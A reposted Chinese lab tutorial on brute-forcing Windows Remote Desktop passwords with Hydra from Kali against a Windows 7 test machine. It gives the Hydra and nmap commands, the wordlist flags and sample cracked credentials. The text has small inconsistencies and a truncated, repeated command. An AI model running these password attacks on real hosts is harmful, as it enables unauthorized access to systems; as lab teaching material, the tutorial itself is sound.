windows远程桌面的密码爆破
概述:
RDP是Windows的远程桌面协议。所占用的端口默认为3389,这个是可以修改的。
要求:
我们要暴力破解3389号端口的前提是对方的3389号端口是开放的。
爆破工具:kali使用hydra(九头蛇)工具进行密码爆破。
hydra语法:
hydra IP地址 rdp -l 用户名 -P 密码字典 -V
rdp 即RDP协议
-l 小写的l 后面加单用户名,已知用户名
-L 大写的L后面加的是用户名字典,破解用户名
-p小写的p后面加的是单密码,已知密码
-P 打写的P后面加是指定密码字典,破解密码
-V 大V是用来显示爆破的详细过程
一、实验题目:
windows远程桌面爆破
二、实验内容:
使用Hydra
三、环境准备:
(1)kali虚拟机(工具和口令字典进行远程桌面爆破)
(2)Windows 7 虚拟机(可以被远程连接的Windows)
注意kali版本太低则无法破解3389端口,rdp需要kali相应的模块支撑。
四、实验步骤:
一、已知对方主机的远程登录用户名下爆破密码:
1. 测试kali与win7的连通性
2. 在KALI虚拟机上面使用命令nmap查看WIN10的3389端口是否打开。
- 在KALI虚拟机上下载好的弱密码的文本文件放到目录下
- 使用海德拉工具Hydra(九头蛇)工具进行爆破,字典的制作可以用工具也可以自己手动输入常见弱口令。密码爆破命令为: hydra IP地址 rdp -l 用户名 -P 密码字典 -V-l 小写的l 后面加单用户名,已知用户名-P 打写的P后面加是指定密码字典,破解密码-V 大V是用来显示爆破的详细过程执行成功结果: 22 host: 10.20.151.183 login: zc password: 123456 1 of 1 target successfully completed, 1 valid password found
账号为zc,密码为123456.
二、同时爆破账户名及密码:
- 创建用户账户本,密码本
- 命令:hydra IP rdp -L 用户本 -P 密码本 -V-L 大L是账号字典 -P 大P是指定密码字典
字典一般要把路径加上不过要是能在相对路径下补全出来就不用
a IP rdp -L 用户本 -P 密码本 -V
-L 大L是账号字典
-P 大P是指定密码字典
字典一般要把路径加上不过要是能在相对路径下补全出来就不用
本文转载自: https://blog.csdn.net/qq_56414082/article/details/128522962
版权归原作者 阿凯6666 所有, 如有侵权,请联系我们删除。
版权归原作者 阿凯6666 所有, 如有侵权,请联系我们删除。